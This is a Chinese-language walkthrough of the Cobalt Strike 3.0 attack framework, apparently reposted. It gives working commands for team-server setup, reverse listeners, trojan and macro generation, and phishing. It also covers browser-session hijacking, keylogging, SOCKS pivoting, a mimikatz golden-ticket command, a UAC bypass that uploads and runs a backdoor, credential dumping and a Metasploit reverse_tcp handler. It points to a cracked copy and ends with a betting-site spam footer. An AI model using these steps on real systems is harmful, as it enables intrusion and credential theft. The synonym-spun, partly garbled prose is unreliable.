0x00 简介Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，win exe木马生成，win dll木马生成，java木马生成，office宏病毒生成，木马捆绑；钓鱼攻击包罗：站点克隆，目的信息获取，java执行，浏览器自动攻击等等。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用，固然可以联合Armitage举行使用。这里有一个破解版：下载地址：戳我(自行验证其宁静性)Cobalt Strike 3.0 延用了其强大的团体服务器功效，能让多个攻击者同时毗连到团体服务器上，共享攻击资源与目的信息和sessions。固然，在使用Cobalt Strike之前，需要安装java情况，详细怎么设置，请移步[java language="情况搭建"][/java]/java3。

0x01 运行与之前版本的 Cobalt Strike差别， Cobalt Strike3.0需要开启团体服务器才可以链接使用，固然，这个服务器可以放到公网情况下，或者放到自己想要搭建此服务的情况中。下载好Cobalt Strike以后包罗以下几个文件：其中关键的文件是teamserver以及cobaltstrike.jar，将这两个文件放到服务器上同一个目录，然后运行：☁ cobaltstrike sudo ./teamserver 192.168.74.1 msf3这里为了利便使用，最好使用详细的ip地址，而不是0.0.0.0或者127.0.0.1, 如果有多个网卡，使用你要用的谁人ip地址即可，msf3 为该团体服务器的毗连密码。

服务运行以后，在客户端举行毗连：☁ cobaltstrike java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar $*这里ip使用服务器的ip，端口默认50050，用户名随意，密码为之前设置的密码，然后connect,弹出验证窗口，然后点是，就进入Cobalt Strike了。0x02 Listeners使用Cobalt Strike首先需要建立一个Listener,依次点击 Cobalt Strike->Listeners ，然后点击Add便可以建立自己想要的Listeners了，Cobalt Strike3.0包罗windows/beacon_dns/reverse_dns_txtwindows/beacon_dns/reverse_httpwindows/beacon_http/reverse_httpwindows/beacon_https/reverse_httpswindows/beacon_smb/bind_pipewindows/foreign/reverse_dns_txtwindows/foreign/reverse_httpwindows/foreign/reverse_httpswindows/foreign/reverse_tcp其中windows/beacon* 是Cobalt Strike自带的模块，包罗dns,http,https,smb四种方式的监听器，windows/foreign* 为外部监听器，即msf或者Armitage的监听器。

选择监听器以后，host会自动填写我们开启服务时的ip，设置监听端口，然后生存，监听器就建立好了。0x03 Attacks建立好监听器，下面就需要设置客户端了，Cobalt Strike包罗多种攻击方式，其中Packages包罗如下几种：HTML Application 生成恶意的HTA木马文件； MS Office Macro 生成office宏病毒文件； Payload Generator 生成种种语言版本的payload; USB/CD AutoPlay 生成使用自动播放运行的木马文件； Windows Dropper 捆绑器，能够对文档类举行捆绑；Windows Executable 生成可执行exe木马； Windows Executable(S)生成无状态的可执行exe木马。Web Drive-by（钓鱼攻击）包罗如下几个模块：Manage对开启的web服务举行治理； Clone Site 克隆网站，可以记载受害者提交的数据； Host File 提供一个文件下载，可以修改Mime信息； PowerShell Web Delivery类似于msf 的web_delivery ; Signed Applet Attack 使用java自签名的法式举行钓鱼攻击; Smart Applet Attack 自动检测java版本并举行攻击，针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本； System Profiler用来获取一些系统信息，好比系统版本，Flash版本，浏览器版本等。Spear Phish 是用来邮件钓鱼的模块。

0x04 ViewView模块可以利便测试者检察各个模块，图形化的界面可以利便的看到受害者机械的各个信息。Applications显示受害者机械的应用信息； Credentials显示受害者机械的凭证信息，能更利便的举行后续渗透； Downloads 文件下载； Event Log可以看到事件日志，清楚的看到系统的事件,而且团队可以在这里谈天; Keystrokes检察键盘记载； Proxy Pivots检察署理信息； Screenshots检察屏幕截图； Script Console在这里可以加载种种剧本以增强功效，剧本地址戳我;Targets检察目的； Web Log检察web日志。另有Reporting的功效就不先容了，主要就是出陈诉用的。0x05 BeaconBeacon可以选择通过DNS还是HTTP协议出口网络，你甚至可以在使用Beacon通讯历程中切换HTTP和DNS。

其支持多主机毗连，部署好Beacon后提交一个要连回的域名或主机的列表，Beacon将通过这些主机轮询。目的网络的防护团队必须拦截所有的列表中的主机才可中断和其网络的通讯。通过种种方式获取shell以后（好比直接运行生成的exe），就可以使用beacon了，右击电脑，Interact，则可打开Beacon Console;在beacon处输入help，则可以看到详细说明：beacon> help Beacon Commands=============== Command Description ------- ----------- browserpivot Setup a browser pivot session bypassuac Spawn a session in a high integrity process cancel Cancel a download that's in-progress cd Change directory checkin Call home and post data clear Clear beacon queue covertvpn Deploy Covert VPN client desktop View and interact with target's desktop dllinject Inject a Reflective DLL into a process download Download a file downloads Lists file downloads in progress drives List drives on target elevate Try to elevate privileges execute Execute a program on target exit Terminate the beacon session getsystem Attempt to get SYSTEM getuid Get User ID hashdump Dump password hashes help Help menu inject Spawn a session in a specific process jobkill Kill a long-running post-exploitation task jobs List long-running post-exploitation tasks kerberos_ccache_use Apply kerberos ticket from cache to this session kerberos_ticket_purge Purge kerberos tickets from this session kerberos_ticket_use Apply kerberos ticket to this session keylogger Inject a keystroke logger into a process kill Kill a process link Connect to a Beacon peer over SMB logonpasswords Dump credentials and hashes with mimikatz ls List files make_token Create a token to pass credentials mimikatz Runs a mimikatz command mkdir Make a directory mode dns Use DNS A as data channel (DNS beacon only) mode dns-txt Use DNS TXT as data channel (DNS beacon only) mode http Use HTTP as data channel mode smb Use SMB peer-to-peer communication net Network and host enumeration tool note Assign a note to this Beacon portscan Scan a network for open services powershell Execute a command via powershell powershell-import Import a powershell script ps Show process list psexec Use a service to spawn a session on a host psexec_psh Use PowerShell to spawn a session on a host pth Pass-the-hash using Mimikatz pwd Print current directory rev2self Revert to original token rm Remove a file or folder rportfwd Setup a reverse port forward runas Execute a program as another user screenshot Take a screenshot shell Execute a command via cmd.exe sleep Set beacon sleep time socks Start SOCKS4a server to relay traffic socks stop Stop SOCKS4a server spawn Spawn a session spawnas Spawn a session as another user spawnto Set executable to spawn processes into steal_token Steal access token from a process timestomp Apply timestamps from one file to another unlink Disconnect from parent Beacon upload Upload a file wdigest Dump plaintext credentials with mimikatz winrm Use WinRM to spawn a session on a host wmi Use WMI to spawn a session on a host对于某个模块的使用方式可以直接使用help检察，如：beacon> help browserpivotUse: browserpivot [pid] [x86|x64] browserpivot [stop] Setup a Browser Pivot into the specified process. To hijack authenticatedweb sessions, make sure the process is an Internet Explorer tab. Theseprocesses have iexplore.exe as their parent process. Use "browserpivot stop" to tear down the browser pivoting sessions associated with this Beacon.下面主要先容几个好玩儿的功效。

这里为了能快速显示效果，可以设置beacon>sleep 00x051 Browserpivot用户注入受害者浏览器历程，然后开启HTTP署理，之后就可以登录受害者登录的网站了。使用方式，ps找到浏览器历程：注入历程：beacon> browserpivot 3452 x64设置当地浏览器署理：当受害者登录某网站账号以后，通过署理，本机浏览器同样登录该网站:固然当被攻击者关闭浏览器的时候，署理也就失效了，关闭此署理可使用如下下令：browserpivot stop0x052 Socks可以直接开启socks4a署理，可以通过署理举行内网渗透测试。

开启socksbeacon>socks 9999这里可以选择其中一台，右键Pivoting->SOCKS Server，则使用此台盘算机开启socks署理。设置proxychains.conf，添加socks4 127.0.0.1 9999然后就可以通过proxychains 使用种种工具做内网渗透了。

或者直接开启隧道使用msf，依次点击View->Proxy Pivots，选择Socks4a Proxy,点击Tunnel:复制以后，在msf中执行，则可以开启署理：关闭socksbeacon>socks stop0x053 Screenshot&Keylogger这里的screenshot可以截取受害者一定时间的屏幕截图，操作下令为：beacon>screenshot [pid] <x86|x64> [run time in seconds]或者beacon>screenshot然后打开View->Screenshots，则可以看到屏幕截图：键盘记载器的使用方式为：Use: keylogger [pid] <x86|x64>然后打开View->Keystrokes，则可以看到键盘记载效果：如果不想使用下令行，可以直接选择受害者盘算机（可多选），右键->Explore->Process List：0x054 powershell-import这个功效在后渗透测试中很有用，可以导入种种powershell渗透框架，好比nishang的powerpreter，直接执行：beacon> powershell-import然后在文件浏览器内里选择 Powerpreter.psm1：或者直接执行：powershell-import [/path/to/local/script.ps1]举行导入，之后就可以使用powerpreter的种种模块了。要执行某模块直接使用如下下令,好比：beacon> powershell Check-VM关于powerpreter之前在zone有简朴的先容，powershell后渗透框架 powerpreter。0x055 kerberos相关这里一共有三个模块，划分是：kerberos_ccache_use :从ccache文件中导入票据kerberos_ticket_purge :清除当前会话的票据kerberos_ticket_use：从ticket文件中导入票据获取黄金票据的方式好比使用mimikatz:kerberos::golden /admin:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /ticket:FILE乌云关于kerberos也有相关文章，有兴趣的可以看一下：内网渗透中的mimikatz域渗透的金之钥匙听说这个在域渗透中很有用哟~0x056 BypassUAC什么，你不能读密码？试试bypassuac吧~ 直接执行beacon> bypassuac下面你就可以执行那些需要最高权限的操作了。这一块在测试Win10的时候并没有乐成，关于Win10的bypassuac我在博客内里也有相关先容，详情:戳我呀 在这里就演示使用bypassuac的powershell剧本来获取Win10最高权限，由于nishang的powershell剧本现在并不支持Win10,所以这里使用了一个我修改的powershell剧本 invoke-BypassUAC.ps1 生成一个beacon后门：上传后门：beacon> cd E:beacon> upload /Users/evi1cg/Desktop/test.exe 加载powershell执行后门：beacon> powershell-import /Users/evi1cg/Pentest/Powershell/MyShell/invoke-BypassUAC.ps1beacon> powershell Invoke-BypassUAC -Command 'E:test.exe'然后他就破了：使用谁人破了的电脑的beacon读取密码：beacon> sleep 0beacon> wdigestbeacon> hashdump0x06 与msf联动cobalt strike3.0 不再使用Metasploit框架而作为一个独立的平台使用，那么怎么通过cobalt strike获取到meterpreter呢，别担忧，可以做到的。

首先我们使用msf的reverse_tcp开启监听模式：msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpretermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.74.1 lhost => 192.168.74.1msf exploit(handler) > set lport 5555lport => 5555msf exploit(handler) > exploit -j之后使用Cobalt Strike建立一个windows/foreign/reverse_tcp Listener：其中ip为msf的ip地址，端口为msf所监听的端口。然后选中盘算机，右键->Spawn:选择刚刚建立的监听器：可以看到乐成获取了meterpreter回话：0x07 小结此次测试使用windows/beacon_http/reverse_http来举行，详细DNS的监听器请参考luom所写Cobalt Strike 之团队服务器的搭建与DNS通讯演示，本篇文章只是先容了Cobalt Strike的部门功效，如有错误，请列位大牛指正，关于Cobalt Strike其他的功效小同伴们可以自己研究，如果可能的话，我也会对其举行增补。希望对列位小同伴有用本文作者：Drops，转载自：http://www.mottoin.com/detail/2862.html。

本文来源：开元体育，开元体育app，开元体育官方网站，开元体育app官方版，开元体育手机app下载安装-www.shqiandao.com